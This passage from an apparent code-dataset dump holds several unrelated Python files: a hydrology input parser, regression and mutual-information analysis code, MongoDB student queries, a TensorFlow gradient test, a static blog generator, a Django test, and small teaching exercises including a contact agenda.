'ERODE'):\n # Set booleans\n result[key.lower()] = True\n\n else:\n # Extract value\n result[key.lower()] = schunk[1]\n return result\n\ndef structureChunk(keywords, resultDict, lines):\n \"\"\"\n Parse Weir and Culvert Structures Method\n \"\"\"\n chunks = pt.chunk(keywords, lines)\n\n # Parse chunks associated with each key\n for key, chunkList in iteritems(chunks):\n # Parse each chunk in the chunk list\n for chunk in chunkList:\n # Strip and split the line (only one item in each list)\n schunk = chunk[0].strip().split()\n\n # Extract values and assign to appropriate key in resultDict\n resultDict[key.lower()] = schunk[1]\n\n return resultDict\n","repo_name":"CI-WATER/gsshapy","sub_path":"gsshapy/lib/cif_chunk.py","file_name":"cif_chunk.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"4132628986","text":"from .helper import *\nfrom .opticflow import VelField\nfrom sklearn.feature_selection import mutual_info_regression\n\n\ndef mi_analysis(\n\t\tz: np.ndarray,\n\t\tg: np.ndarray,\n\t\tn_bins: int = 20,\n\t\tparallel: bool = True,\n\t\tbackend: str = 'loky',\n\t\tn_jobs: int = -1,):\n\t# mi regression\n\tif parallel:\n\t\twith joblib.parallel_backend(backend):\n\t\t\tmi = joblib.Parallel(n_jobs=n_jobs)(\n\t\t\t\tjoblib.delayed(mutual_info_regression)\n\t\t\t\t(g, z[:, i]) for i in range(z.shape[-1])\n\t\t\t)\n\t\tmi = np.stack(mi).T\n\telse:\n\t\tmi = np.zeros((g.shape[-1], z.shape[-1]))\n\t\tfor i in range(len(mi)):\n\t\t\tmi[i] = mutual_info_regression(z, g[:, i])\n\t# mi normalized (discrete)\n\tmi_normalized = discrete_mutual_info(\n\t\tz=z,\n\t\tg=g,\n\t\taxis=1,\n\t\tn_bins=n_bins,\n\t\tparallel=parallel,\n\t\tn_jobs=n_jobs,\n\t)\n\toutput = {\n\t\t'mi': mi,\n\t\t'mi_norm': mi_normalized,\n\t\t'mig': compute_mig(mi_normalized),\n\t}\n\treturn 
output\n\n\ndef regress(\n\t\tz: np.ndarray,\n\t\tg: np.ndarray,\n\t\tz_tst: np.ndarray,\n\t\tg_tst: np.ndarray,\n\t\tprocess: bool = True, ):\n\tif process:\n\t\tmu, sd = z.mean(), z.std()\n\t\tz = (z - mu) / sd\n\t\tz_tst = (z_tst - mu) / sd\n\t# linear regression\n\tlr = sk_linear.LinearRegression().fit(z, g)\n\tg_pred = lr.predict(z_tst)\n\t# performance\n\tr = 1 - sp_dist.cdist(\n\t\tXA=g_tst.T,\n\t\tXB=g_pred.T,\n\t\tmetric='correlation',\n\t)\n\tr2 = sk_metric.r2_score(\n\t\ty_true=g_tst,\n\t\ty_pred=g_pred,\n\t\tmultioutput='raw_values',\n\t)\n\tr2[r2 <= 0] = np.nan\n\t# DCI\n\tw = np.abs(lr.coef_)\n\tw *= z.std(0).reshape(1, -1)\n\tw /= g.std(0).reshape(-1, 1)\n\td, c = compute_dci(w)\n\toutput = {\n\t\t'r': r,\n\t\t'r2': r2,\n\t\t'd': d,\n\t\t'c': c,\n\t}\n\treturn output\n\n\ndef compute_mig(mi_normalized: np.ndarray, axis: int = 0):\n\tassert mi_normalized.ndim == 2\n\tn_factors = mi_normalized.shape[axis]\n\tmig = np.zeros(n_factors)\n\tfor i in range(n_factors):\n\t\ta = mi_normalized.take(i, axis)\n\t\tinds = np.argsort(a)[::-1]\n\t\tmig[i] = a[inds[0]] - a[inds[1]]\n\treturn mig\n\n\ndef compute_dci(w: np.array):\n\t# p_disentang\n\tdenum = w.sum(0, keepdims=True)\n\tdenum[denum == 0] = np.nan\n\tp_disentang = w / denum\n\t# p_complete\n\tdenum = w.sum(1, keepdims=True)\n\tdenum[denum == 0] = np.nan\n\tp_complete = w / denum\n\t# compute D and C\n\td_i = 1 - entropy_normalized(p_disentang, 0)\n\tc_mu = 1 - entropy_normalized(p_complete, 1)\n\trho = w.sum(0) / w.sum()\n\td = np.nansum(d_i * rho)\n\tc = np.nanmean(c_mu)\n\treturn d, c\n\n\nclass LinearModel(object):\n\tdef __init__(\n\t\t\tself,\n\t\t\tcategory: str,\n\t\t\tx: np.ndarray,\n\t\t\ty: np.ndarray,\n\t\t\tx_tst: np.ndarray = None,\n\t\t\ty_tst: np.ndarray = None,\n\t\t\talphas: Iterable[float] = None,\n\t\t\tn_folds: int = 5,\n\t\t\tseed: int = 0,\n\t\t\tverbose: bool = False,\n\t):\n\t\tsuper(LinearModel, self).__init__()\n\t\tself.fn = getattr(sk_linear, category)\n\t\tself.defaults = get_default_params(self.fn)\n\t\tif 'random_state' in self.defaults:\n\t\t\tself.defaults['random_state'] = seed\n\t\tself.category = category\n\t\tself.kwargs = None\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.x_tst = x_tst\n\t\tself.y_tst = y_tst\n\t\tif alphas is None:\n\t\t\talphas = [0.1, 1, 10, 100]\n\t\tassert isinstance(alphas, Collection)\n\t\tif category == 'LinearRegression':\n\t\t\talphas = [0]\n\t\tself.alphas = alphas\n\t\tself.kf = sk_modselect.KFold(\n\t\t\tn_splits=n_folds,\n\t\t\trandom_state=seed,\n\t\t\tshuffle=True,\n\t\t)\n\t\tself.models = {}\n\t\tself.kers = {}\n\t\tself.preds = {}\n\t\tself._init_df()\n\n\t\tif verbose:\n\t\t\tmsg = f\"Category: '{self.category}', \"\n\t\t\tmsg += f\"default params:\\n{self.defaults}\"\n\t\t\tprint(msg)\n\n\tdef best_alpha(self):\n\t\tassert self.kwargs is not None\n\t\tif self.category in ['Ridge', 'LinearRegression']:\n\t\t\tbest_a, perf = max(\n\t\t\t\tself.df['r'].items(),\n\t\t\t\tkey=lambda t: t[1],\n\t\t\t)\n\t\telif self.category == 'PoissonRegressor':\n\t\t\tbest_a, perf = max(\n\t\t\t\tself.df['nnll'].items(),\n\t\t\t\tkey=lambda t: t[1],\n\t\t\t)\n\t\telse:\n\t\t\traise NotImplementedError(self.category)\n\t\tif best_a not in self.models:\n\t\t\t_ = self._fit(best_a)\n\t\treturn best_a, perf\n\n\tdef fit_linear(self, **kwargs):\n\t\tself.kwargs = setup_kwargs(self.defaults, kwargs)\n\t\tself.kwargs = filter_kwargs(self.fn, self.kwargs)\n\t\tself._fit_xv()\n\t\treturn self\n\n\tdef _fit_xv(self):\n\t\tfor a in self.alphas:\n\t\t\tnnll, r = [], []\n\t\t\tif 'alpha' 
in self.kwargs:\n\t\t\t\tself.kwargs['alpha'] = a\n\t\t\tfor f, (trn, vld) in enumerate(self.kf.split(self.x)):\n\t\t\t\tmodel = self.fn(**self.kwargs)\n\t\t\t\tmodel.fit(flatten_stim(self.x[trn]), self.y[trn])\n\t\t\t\tpred = model.predict(flatten_stim(self.x[vld]))\n\t\t\t\tnnll.append(null_adj_ll(self.y[vld], np.maximum(0, pred)))\n\t\t\t\tr.append(sp_stats.pearsonr(self.y[vld], pred)[0])\n\t\t\tself.df.loc[a, 'nnll'] = np.nanmean(nnll)\n\t\t\tself.df.loc[a, 'r'] = np.nanmean(r)\n\t\treturn\n\n\tdef _fit(self, a: float):\n\t\tif 'alpha' in self.kwargs:\n\t\t\tself.kwargs['alpha'] = a\n\t\tmodel = self.fn(**self.kwargs)\n\t\tmodel.fit(flatten_stim(self.x), self.y)\n\t\tkernel = model.coef_.reshape(self.x.shape[1:])\n\t\ttry:\n\t\t\tself.kers[a] = VelField(kernel)\n\t\texcept AssertionError:\n\t\t\tself.kers[a] = kernel\n\t\tself.models[a] = model\n\t\t# test\n\t\tif self.x_tst is not None:\n\t\t\tpred = model.predict(flatten_stim(self.x_tst))\n\t\t\tr = sp_stats.pearsonr(self.y_tst, pred)[0]\n\t\t\tr2 = sk_metric.r2_score(self.y_tst, pred)\n\t\t\tself.df.loc[a, 'r2_tst'] = r2\n\t\t\tself.df.loc[a, 'r_tst'] = r\n\t\t\tself.preds[a] = pred\n\t\treturn model\n\n\tdef _init_df(self):\n\t\tfill_vals = [np.nan] * len(self.alphas)\n\t\tdf = {\n\t\t\t'alpha': self.alphas,\n\t\t\t'r': fill_vals,\n\t\t\t'nnll': fill_vals,\n\t\t}\n\t\tif self.x_tst is not None:\n\t\t\tdf.update({\n\t\t\t\t'r_tst': fill_vals,\n\t\t\t\t'r2_tst': fill_vals,\n\t\t\t})\n\t\tself.df = pd.DataFrame(df).set_index('alpha')\n\t\treturn\n\n\tdef show_pred(self, figsize=(6.0, 3.0)):\n\t\tif not self.preds:\n\t\t\treturn\n\t\tfig, ax = create_figure(1, 1, figsize)\n\t\tax.plot(self.y_tst, lw=1.8, color='k', label='true')\n\t\tfor i, (a, pred) in enumerate(self.preds.items()):\n\t\t\tr2 = self.df.loc[a, 'r2_tst'] * 100\n\t\t\tlbl = r\"$R^2 = $\" + f\"{r2:0.1f}% (\"\n\t\t\tlbl += r\"$\\alpha = $\" + f\"{a:0.2g})\"\n\t\t\tax.plot(pred, color=f'C{i}', label=lbl)\n\t\tax.legend(fontsize=8)\n\t\tleg = ax.get_legend()\n\t\tif leg is not None:\n\t\t\tleg.set_bbox_to_anchor((1.0, 1.03))\n\t\tax.grid()\n\t\tplt.show()\n\t\treturn fig, ax\n\n\ndef compute_sta(\n\t\tn_lags: int,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray,\n\t\tgood: np.ndarray = None,\n\t\tzscore: bool = True,\n\t\tnanzero: bool = True,\n\t\tverbose: bool = False, ):\n\tassert n_lags >= 0\n\tshape = stim.shape\n\tnc = spks.shape[-1]\n\tsta = np.zeros((nc, n_lags+1, *shape[1:]))\n\tshape = (nc,) + (1,) * len(shape)\n\tif zscore:\n\t\tstim = sp_stats.zscore(stim)\n\tif good is None:\n\t\tinds = np.arange(len(stim))\n\telse:\n\t\tinds = good.copy()\n\tinds = inds[inds > n_lags]\n\tfor t in tqdm(inds, disable=not verbose):\n\t\t# zero n_lags allowed:\n\t\tx = stim[t - n_lags: t + 1]\n\t\tfor i in range(nc):\n\t\t\ty = spks[t, i]\n\t\t\tif y > 0:\n\t\t\t\tsta[i] += x * y\n\tn = spks[inds].sum(0)\n\tn = n.reshape(shape)\n\tsta /= n\n\tif nanzero:\n\t\tsta[np.isnan(sta)] = 0.0\n\t\tif verbose:\n\t\t\twarnings.warn(\"NaN in STA\", RuntimeWarning)\n\treturn sta\n","repo_name":"hadivafaii/_MTMST","sub_path":"analysis/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41372101451","text":"from pymongo.mongo_client import MongoClient\n\ndef get_database():\n url = 'mongodb://localhost:27017/'\n\n # Create a new client and connect to the server\n client = MongoClient(url)\n\n return client['school']\n\n\ndef get_students():\n db = get_database()\n 
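# find() with no filter returns a cursor over every student document; a\n # projection such as collection.find({}, {'name': 1}) (a sketch, not part\n # of the original file) would pull back only the one field used below.\n 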
collection = db[\"students\"]\n documents = collection.find()\n\n users = []\n\n for doc in documents:\n users.append(doc['name'])\n\n return users\n\n\ndef get_top_10_students():\n db = get_database()\n collection = db[\"students\"]\n top_students = collection.find({}, {'name': 1, 'scores': {'$slice': [0, 1]}}).sort([('scores.0', -1)]).limit(10)\n\n\n students = []\n for s in top_students:\n student = {\"name\": s[\"name\"], \"score\": s[\"scores\"][0][\"score\"]}\n students.append(student)\n\n return students\n\ndef get_top_10_students_aggregate():\n db = get_database()\n collection = db[\"students\"]\n pipeline = [\n { \"$project\": { \"name\": 1, \"examScore\": { \"$arrayElemAt\": [\"$scores.score\", 0] } } },\n { \"$sort\": { \"examScore\": -1 } },\n { \"$limit\": 10 }]\n\n result = collection.aggregate(pipeline)\n\n students = []\n for s in result:\n student = {\"name\": s[\"name\"], \"score\": s[\"examScore\"]}\n students.append(student)\n\n return students\n\ndef create_student(student):\n db = get_database()\n collection = db[\"students\"]\n\n result = collection.insert_one(student)\n\n return result\n","repo_name":"JuliusKryger/DatabaseSP3","sub_path":"server/services/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73191096426","text":"import numpy as np\nimport tensorflow as tf\n\nb_size = 16\ni_size = 32\no_size = 8\n\nnp.random.seed(3)\ntf.set_random_seed(3)\n\nx = tf.placeholder(tf.float32, shape=[b_size, i_size])\n\nW_a = tf.Variable(tf.random_uniform([i_size, 1]), name='W_a')\nb_a = tf.Variable(tf.zeros([1]), name='b_a')\np_a = tf.nn.sigmoid(tf.matmul(x, W_a) + b_a)\n\nW_1 = tf.Variable(tf.random_uniform([i_size, o_size]), name='W_1')\nb_1 = tf.Variable(tf.zeros([o_size]), name='b_1')\np_1 = tf.nn.softmax(tf.matmul(x, W_1) + b_1)\n\nW_2 = tf.Variable(tf.random_uniform([i_size, o_size]), name='W_2')\nb_2 = tf.Variable(tf.zeros([o_size]), name='b_2')\np_2 = tf.nn.softmax(tf.matmul(x, W_2) + b_2)\n\n# b_y = tf.Variable(tf.zeros([o_size]), name='b_y')\n\n# y = p_a * p_1 + (1 - p_a) * p_2\n\n# act = tf.stop_gradient(tf.cast(tf.greater(p_a, tf.constant(0.5, name='0.5')), tf.float32))\nact = tf.cast(tf.greater(p_a, tf.constant(0.5, name='0.5')), tf.float32)\n\ny = (act * p_1 + (1 - act) * p_2) * p_a\n# y = (act * p_1 + (1 - act) * p_2 + b_y) * p_a\n\nt = tf.placeholder(tf.float32, shape=[b_size, o_size])\nl = tf.reduce_mean(tf.square(y - t))\n\noptimizer = tf.train.AdamOptimizer(0.1)\ngrads_and_vars = optimizer.compute_gradients(l)\ntrain_op = optimizer.apply_gradients(grads_and_vars)\n\n# mannually check each grad & var\n# grads = []\n# names = []\n\n# for g, v in tuple(grads_and_vars):\n# \tif g is not None:\n# \t\tgrads.append(g)\n# \telse:\n# \t\tgrads.append(tf.constant('None'))\n# \tnames.append(v.name)\n\n# train_op = optimizer.minimize(l)\n\ninit_op = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n\tsess.run(init_op)\n\n\tsummary_writer = tf.train.SummaryWriter('./', sess.graph)\n\tsummary_writer.flush()\n\n\tx_np = np.random.rand(b_size, i_size).astype(np.float32)\n\tt_np = np.random.rand(b_size, o_size).astype(np.float32)\n\n\tfeed_dict = {\n\t\tx : x_np,\n\t\tt : t_np\n\t}\n\n\t# print sess.run(W_a).reshape(1, -1)\n\t# grads_np = sess.run(grads, feed_dict=feed_dict)\n\t# for grad, name in zip(grads_np, names):\n\t# \tprint name, grad if isinstance(grad, str) else grad.shape\n\t# sess.run(train_op, 
feed_dict=feed_dict)\n\t# print sess.run(W_a).reshape(1, -1)\n\n\tgrads_np = sess.run(train_op, feed_dict=feed_dict)","repo_name":"zihangdai/tensorflow_feature_test","sub_path":"discrete_module.py","file_name":"discrete_module.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29900825095","text":"from bs4 import BeautifulSoup\nfrom collections import namedtuple\nimport datetime\nimport os\n\n\nSRC_DIR = '.'\nTEMPLATES_DIR = 'templates'\n\nARTICLE_CARD = \"\"\"\n<div class=\"card row\">\n <div class=\"col card-body\">\n <a href=\"{article_link}\" class=\"article-card link\">\n <h3 class=\"card-title\">{title}</h3>\n </a>\n <div class=\"card-text\">\n <ul class=\"taglist\">\n {tags}\n </ul>\n <div><b>Published Date:</b> <time datetime=\"{date}\">{readable_date}</time></div>\n <p>{summary}</p>\n </div>\n </div>\n</div>\n\"\"\"\n\nTAGS_PAGE = \"\"\"\n<div class=\"container mt-4\">\n <h2>Tags</h2>\n <ul class=\"alltags\">\n {tags}\n </ul>\n</div>\n\"\"\"\n\nArticle = namedtuple('Article', ['title', 'date', 'tags', 'summary', 'path'])\n\n\ndef parse_article(article_path):\n with open(article_path, 'r') as f:\n article_html = f.read()\n\n path = '/articles/{}'.format(article_path.split('/')[-1])\n\n soup = BeautifulSoup(article_html, 'html.parser')\n article_soup = soup.find('div', attrs={'class': 'article'})\n assert article_soup, \"Failed to find the article class\"\n\n title = article_soup.find('h2')\n assert(title)\n title = title.get_text()\n\n taglist = article_soup.find(attrs={'class': 'taglist'})\n tags = []\n for tag in taglist.find_all('li'):\n tags.append(tag.get_text().strip())\n\n date_str = article_soup.find('time').attrs.get('datetime', '')\n assert(date_str)\n year, month, day = map(int, date_str.split('-'))\n date = datetime.date(year, month, day)\n\n summary = article_soup.find(attrs={'class': 'summary'})\n for tag in summary.find_all(attrs={'class': 'sup-reference'}):\n tag.decompose()\n for tag in summary.find_all(attrs={'class': 'reference'}):\n tag.decompose()\n\n return Article(title, date, tags, summary, path)\n\n\ndef read_articles():\n article_names = os.listdir(f'{SRC_DIR}/articles')\n article_paths = [os.path.join(os.path.abspath('.'), f'{SRC_DIR}/articles',\n name) for name in article_names if name.endswith('.html')]\n return sorted(list(map(parse_article, article_paths)), key=lambda x: x.date)\n\n\ndef build_card(article):\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(article.tags):\n soup = BeautifulSoup(f'<li><a href=\"#\">{tag}</a></li>', 'html.parser')\n tags.insert(i, soup)\n\n card = ARTICLE_CARD.format(title=article.title, tags=tags.prettify(),\n date=article.date.strftime('%Y-%m-%d'), readable_date=article.date.strftime('%B %d, %Y'),\n summary=article.summary.prettify(), article_link=article.path)\n return BeautifulSoup(card, 'html.parser')\n\n\ndef build_cards(articles):\n built = BeautifulSoup('<div class=\"container\"></div>', 'html.parser')\n container = built.contents[0]\n\n for i, article in enumerate(articles):\n container.insert(i, build_card(article))\n\n return built\n\n\ndef write(html, title, file_path):\n with open(f'{TEMPLATES_DIR}/head.html', 'r') as f:\n head = f.read()\n\n with open(f'{TEMPLATES_DIR}/tail.html', 'r') as f:\n tail = f.read()\n\n full_html = BeautifulSoup(head + html + tail, 'html.parser')\n title_html = full_html.find('title')\n title_html.clear()\n title_html.insert(0, title)\n with open(file_path, 
'w') as f:\n f.write(full_html.prettify())\n\n\ndef build_tag_page(tag, articles):\n cards = build_cards(articles)\n heading = f'Tag: {tag}'\n\n container = cards.find('div', attrs={'class': 'container'})\n tag_heading = BeautifulSoup(f'<h2 class=\"tag mt-4\">{heading}</h2>', 'html.parser')\n container.insert(0, tag_heading)\n\n write(cards.prettify(), f\"{heading} | Layog's blog\",\n f'{SRC_DIR}/tag/{tag.lower()}.html')\n\n\ndef build_tags_pages(articles):\n all_tags = {}\n for article in articles:\n for tag in article.tags:\n all_tags.setdefault(tag.lower(), ([], []))\n all_tags[tag.lower()][0].append(tag)\n all_tags[tag.lower()][1].append(article)\n\n for tag, (representations, articles) in all_tags.items():\n if len(set(representations)) > 1:\n print(\"WARNING: There are multiple representations for tag {}: {}\".format(tag, \", \".join(representations)))\n\n build_tag_page(representations[0], articles)\n\n lower_tags = list(all_tags.keys())\n lower_tags.sort(key=lambda x: (len(all_tags[x][1]), x))\n\n tags = BeautifulSoup('', 'html.parser')\n for i, tag in enumerate(lower_tags):\n rep = all_tags[tag][0][0]\n count = len(all_tags[tag][1])\n soup = BeautifulSoup(f'<li><a href=\"/tag/{tag}.html\">{rep} ({count})</a></li>', 'html.parser')\n tags.insert(i, soup)\n\n write(TAGS_PAGE.format(tags=tags.prettify()), \"Tags | Layog's blog\",\n f'{SRC_DIR}/tags.html')\n\n\ndef build_home_page(articles):\n cards = build_cards(articles)\n first_card = cards.find('div', attrs={'class': 'card'})\n first_card.attrs['class'].append('mt-4')\n write(cards.prettify(), \"Layog's blog\", f'{SRC_DIR}/index.html')\n\n\ndef update_dates_in_articles(articles):\n for article in articles:\n article_file_name = article.path.split('/')[-1]\n article_file_path = f'{SRC_DIR}/articles/{article_file_name}'\n\n with open(article_file_path, 'r') as f:\n soup = BeautifulSoup(f.read(), 'html.parser')\n\n for date_tag in soup.find_all('time'):\n date_str = date_tag.attrs.get('datetime', '')\n assert(date_str)\n year, month, day = map(int, date_str.split('-'))\n date = datetime.date(year, month, day)\n\n date_tag.clear()\n date_tag.insert(0, date.strftime('%B %d, %Y'))\n\n with open(article_file_path, 'w') as f:\n f.write(soup.prettify())\n\n\ndef main():\n articles = read_articles()\n build_home_page(articles)\n build_tags_pages(articles)\n update_dates_in_articles(articles)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"layog/layog.github.io","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36301064090","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db import models\nfrom django.db.models.loading import load_app\nfrom django.test import TestCase\n\nfrom usertools.helpers import update_related_fields\nfrom usertools.tests.test_app.models import Author, Book, Chapter, Page\n\n\nclass HelpersTest(TestCase):\n # @@@ If I was really cool I'd put these in here.\n # fixtures = []\n\n def setUp(self):\n self.old_INSTALLED_APPS = settings.INSTALLED_APPS\n settings.INSTALLED_APPS = (\n 'usertools',\n 'usertools.tests.test_app',\n )\n load_app('usertools.tests.test_app')\n call_command('syncdb', verbosity=0, interactive=False)\n\n def tearDown(self):\n settings.INSTALLED_APPS = self.old_INSTALLED_APPS\n\n def test_update_related_fields(self):\n \"usertools.helpers.update_related_fields: Update related object 
fields.\"\n user1 = Author.objects.create(name=\"john\")\n user2 = Author.objects.create(name=\"igor\")\n\n book = Book.objects.create(user=user1, title=\"Igor le labrador\")\n chapter = Chapter.objects.create(user=user1, book=book, number=1)\n \n # update book/chapter for Igor.\n update_related_fields(book, {\"user\": user2.id})\n\n updated_book = user2.book_set.all()[0]\n updated_chapter = user2.chapter_set.all()[0]\n \n # page will not be updated because fieldname is different.\n page = Page.objects.create(author=user2, book=book, \n chapter=updated_chapter, number=1)\n \n # update book/chapter for John.\n update_related_fields(updated_book, {\"user\": user1.id})\n \n self.assertEquals(user2.book_set.all().count(), 0) \n self.assertEquals(user1.book_set.all().count(), 1)\n\n self.assertEquals(user2.chapter_set.all().count(), 0)\n self.assertEquals(user1.chapter_set.all().count(), 1)\n\n self.assertEquals(user2.page_set.all().count(), 1)\n self.assertEquals(user1.page_set.all().count(), 0)","repo_name":"johnboxall/django_usertools","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
{"seq_id":"10599203448","text":"'''\r\npoint = 0\r\nuinpt = 0\r\nwhile (point < 20):\r\n uinpt = int(input('Enter score: '))\r\n point = point + uinpt\r\n print(str(uinpt) + ' points added.')\r\nprint(str(point) + ' points, so you are over 20.')\r\n\r\n#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#__#_#_#_#\r\n\r\nstar = 0\r\n\r\nwhile star < 100:\r\n star = star + 1\r\n print('★' + str(star))\r\n\r\n'''\r\n\r\nbasket = 0\r\nsoccer = 0\r\nbaseba = 0\r\n\r\nuserin = ''\r\n\r\nwhile (userin != '3'):\r\n userin = input('Basketball[0] Soccer ball[1] Baseball[2] Quit[3]: ')\r\n if (userin == '0'):\r\n basket = basket + 1\r\n elif (userin == '1'):\r\n soccer = soccer + 1\r\n elif (userin == '2'):\r\n baseba = baseba + 1\r\n elif (userin == '3'):\r\n break\r\n else:\r\n print('Invalid input')\r\n\r\nprint('\\n===== [ TOTAL ] =====')\r\nprint('Basketball: ' + str(basket) + ' pcs')\r\nprint('Soccer ball: ' + str(soccer) + ' pcs')\r\nprint('Baseball: ' + str(baseba) + ' pcs')\r\n\r\n\r\n","repo_name":"dhlife09/pyschool","sub_path":"20201102다트.py","file_name":"20201102다트.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16741447224","text":"'''9) Build a class that manages an address book (agenda). For each\ncontact it must store the name, the phone number and the email. It must also show a menu\nwith the following options: Add contact, List contacts, Search contact,\nEdit contact, Close the agenda.'''\n\nimport os, re\n\nclass Contacto:\n\n def __init__(self, apellido, nombre, telefono, email):\n self.apellido = apellido\n self.nombre = nombre\n self.telefono = telefono\n self.email = email\n\n def __str__(self):\n return f'Apellido: {self.apellido}\\nNombre: {self.nombre}\\nTelefono: {self.telefono}\\nEmail: {self.email}'\n\n\nclass Agenda:\n\n def __init__(self):\n self.contactos=[]\n\n def __str__(self):\n for contacto in self.contactos:\n print(contacto)\n\n def agregarContacto(self):\n '''This method asks the user to enter the name, phone number and email of the contact they want to add, checking that the entered data is valid. If the data is valid, a Contacto object is created and added to the Agenda.'''\n apellido = input(\"Ingrese el apellido: \").title()\n\n nombre = input(\"Ingrese el nombre: \").title()\n\n entradaTel = input(\"Ingrese el número de teléfono:\")\n\n if re.search('^[0-9]{10}$',entradaTel):# if the input matches the regular expression, it is valid\n telefono = int(entradaTel)\n else:\n print(\"Debe ingresar diez caracteres numéricos.\")\n return self.agregarContacto() # retry; return so this call cannot fall through with telefono unset\n\n entradaEmail = input(\"Ingrese la dirección de email:\")\n if re.search('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$',entradaEmail):# if the input matches the regular expression, it is valid\n email = entradaEmail\n else:\n print(\"Debe ingresar una dirección de email válida.\")\n return self.agregarContacto() # retry; return so this call cannot fall through with email unset\n\n contacto = Contacto(apellido, nombre, telefono, email)\n #print(contacto.__str__())\n\n self.contactos.append(contacto)\n\n def listaContactos(self):\n '''This method checks whether any contacts are stored in the agenda. If there are, it walks through them and prints them to the screen. If there are none, it prints a message.'''\n\n if len(self.contactos) >0:\n for contacto in self.contactos:\n print('Contacto:')\n print(contacto.__str__())\n print()\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n def buscarContacto(self):\n\n if len(self.contactos) >0:\n apellido =input('Ingrese el apellido del contacto que desea buscar en la agenda: ').title()\n\n nombre =input('Ingrese el nombre del contacto que desea buscar en la agenda: ').title()\n\n for contacto in self.contactos:\n if contacto.apellido == apellido and contacto.nombre == nombre:\n print('Contacto:')\n print(contacto.__str__())\n print()\n else:\n print(f'{apellido}, {nombre} no está almacenado en la agenda.')\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n\n def editarContacto(self):\n\n telValido = False\n emailValido = False\n\n if len(self.contactos) >0:\n apellido =input('Ingrese el apellido del contacto que desea editar: ').title()\n\n nombre =input('Ingrese el nombre del contacto que desea editar: ').title()\n\n for contacto in self.contactos:\n if contacto.apellido == apellido and contacto.nombre == nombre:\n while telValido == False:\n telefono = input(\"Ingrese el número de teléfono:\")\n if re.search('^[0-9]{10}$',telefono):# if the input matches the regular expression, it is valid\n contacto.telefono = int(telefono)\n telValido = True\n else:\n print(\"Debe ingresar diez caracteres numéricos.\")\n\n while emailValido == False:\n email = input(\"Ingrese la dirección de email:\")\n if re.search('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$',email):# if the input matches the regular expression, it is valid\n contacto.email = email\n emailValido = True\n else:\n print(\"Debe ingresar una dirección de email válida.\")\n\n print('Contacto modificado:')\n print(contacto.__str__())\n print()\n\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n def menu(self):\n # clear the screen\n '''\n if os.name == \"posix\":\n os.system (\"clear\")\n elif os.name == \"ce\" or os.name == \"nt\" or os.name == \"dos\":\n os.system (\"cls\")'''\n\n entrada = input(\"Ingrese una opción: \\n1: Agregar contacto \\n2: Lista de contactos \\n3: Buscar contacto \\n4: Editar contacto \\n5: Cerrar agenda \")\n\n try:\n opcionNro = int(entrada)\n\n if(opcionNro == 1):\n self.agregarContacto()\n elif(opcionNro == 2):\n 
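# A hedged aside, not in the original: a dict of bound methods, e.g.\n # {1: self.agregarContacto, 2: self.listaContactos}, dispatched with\n # .get(opcionNro), would replace this if/elif ladder.\n 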
self.listaContactos()\n elif(opcionNro == 3):\n self.buscarContacto()\n elif(opcionNro == 4):\n self.editarContacto()\n elif(opcionNro == 5):\n exit()\n else:\n print(\"Debe ingresar un número entero entre 1 y 5\")\n except ValueError:\n print(\"Debe ingresar un número entero.\")\n\n print()\n self.menu()\n\n#MAIN\nagenda=Agenda()\nagenda.menu()\n","repo_name":"TriniBora/CodoACodo-DWFullStackPyhton","sub_path":"Ejercicios/Python/POO/Practica 3/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31320144324","text":"import os\nimport glob\nimport json\nimport numpy as np\nimport pickle\nimport random\nimport re\nfrom pyquaternion import Quaternion\n\nimport torch\nfrom torch_geometric.data import Data, DataLoader\n\n# -----------------------------------------------------------------------------------\n# Constants\n# -----------------------------------------------------------------------------------\n\nTARGET_ENC = np.array([1, 0, 0])\nDISTRACT_ENC = np.array([0, 1, 0])\nGRIPPER_ENC = np.array([0, 0, 1])\n\n# -----------------------------------------------------------------------------------\n# Funcs\n# -----------------------------------------------------------------------------------\n\ndef load_npy_to_graph_pl(data_dir, use_relative_position=True):\n \"\"\"Constructs graph dataset from state data numpy matrices.\n Shape: num_episodes * (4 + number of objects) * 7 (usually pose xyz-quaternion except for\n gripper open/close which is padded with 6 zeroes)\n\n Indices: \n 0 - joint positions\n 1 - joint velocities\n 2 - gripper open\n 3 - gripper pose\n\n 4 - target pose\n 5 - distractor pose\n 6 - distractor pose\n \"\"\"\n # TODO: Add gripper open/close into embedding\n # TODO: Deduce number of nodes .npy file\n\n # get all episodes\n pattern = os.path.join(data_dir, \"*/*/*/*.npy\")\n episode_files = glob.glob(pattern)\n\n print(f'Found {len(episode_files)} numpy state data files to load.')\n # construct 